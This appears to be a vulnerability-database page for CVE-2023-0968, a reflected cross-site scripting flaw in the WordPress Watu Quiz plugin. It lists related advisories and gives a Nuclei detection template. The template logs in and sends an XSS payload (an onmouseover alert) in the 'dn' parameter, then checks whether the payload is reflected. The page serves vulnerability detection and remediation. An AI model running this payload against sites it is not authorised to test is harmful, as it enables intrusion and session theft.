| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| WordPress Watu Quiz 3.3.9 / GN Publisher 1.5.5 / Japanized For WooComerce 2.5.4 XSS Vulnerability | 23 Mar 202300:00 | – | zdt | |
| CVE-2023-0968 | 3 Mar 202322:15 | – | attackerkb | |
| CVE-2023-0968 | 4 Mar 202300:35 | – | circl | |
| WordPress plugin Watu Quiz 跨站脚本漏洞 | 3 Mar 202300:00 | – | cnnvd | |
| CVE-2023-0968 | 3 Mar 202321:29 | – | cve | |
| CVE-2023-0968 Watu Quiz <= 3.3.9 - Reflected Cross-Site Scripting | 3 Mar 202321:29 | – | cvelist | |
| CVE-2023-0968 | 3 Mar 202322:15 | – | nvd | |
| CVE-2023-0968 | 3 Mar 202322:15 | – | osv | |
| WordPress Watu Quiz 3.3.9 / GN Publisher 1.5.5 / Japanized For WooComerce 2.5.4 XSS | 23 Mar 202300:00 | – | packetstorm | |
| WordPress Watu Quiz Plugin <= 3.3.9 is vulnerable to Cross Site Scripting (XSS) | 6 Mar 202300:00 | – | patchstack |
id: CVE-2023-0968
info:
name: WordPress Watu Quiz <3.3.9.1 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
WordPress Watu Quiz plugin before 3.3.9.1 is susceptible to cross-site scripting. The plugin does not sanitize and escape some parameters, such as email, dn, date, and points, before outputting then back in a page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This exploit can be used against high-privilege users such as admin.
impact: |
Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser.
remediation: Fixed in version 3.3.9.1.
reference:
- https://wpscan.com/vulnerability/29008d1a-62b3-4f40-b5a3-134455b01595
- https://wordpress.org/plugins/watu/
- https://plugins.trac.wordpress.org/browser/watu/trunk/views/takings.php#L31
- https://nvd.nist.gov/vuln/detail/CVE-2023-0968
- https://www.wordfence.com/threat-intel/vulnerabilities/id/6341bdcc-c99f-40c3-81c4-ad90ff19f802
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-0968
cwe-id: CWE-79
epss-score: 0.01252
epss-percentile: 0.65833
cpe: cpe:2.3:a:kibokolabs:watu_quiz:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: kibokolabs
product: watu_quiz
framework: wordpress
tags: cve2023,cve,wordpress,wp,wp-plugin,xss,watu,authenticated,wpscan,kibokolabs,vuln
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=watu_takings&exam_id=1&dn="%2Fonmouseover%3Dalert(document.domain)%2F%2F HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- 'contains(body_2, "/onmouseover=alert(document.domain)//")'
- 'contains(body_2, "Watu Quizzes")'
condition: and
# digest: 4a0a0047304502206d0cdb802a94e9a1a0d97d2c9f9011afe47f469d1f788a58251e119e7ec1b1ed022100bc269d68b1005b344bb90b298e28e39f1e713801c0099f6aaeb335e46e20dd0d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation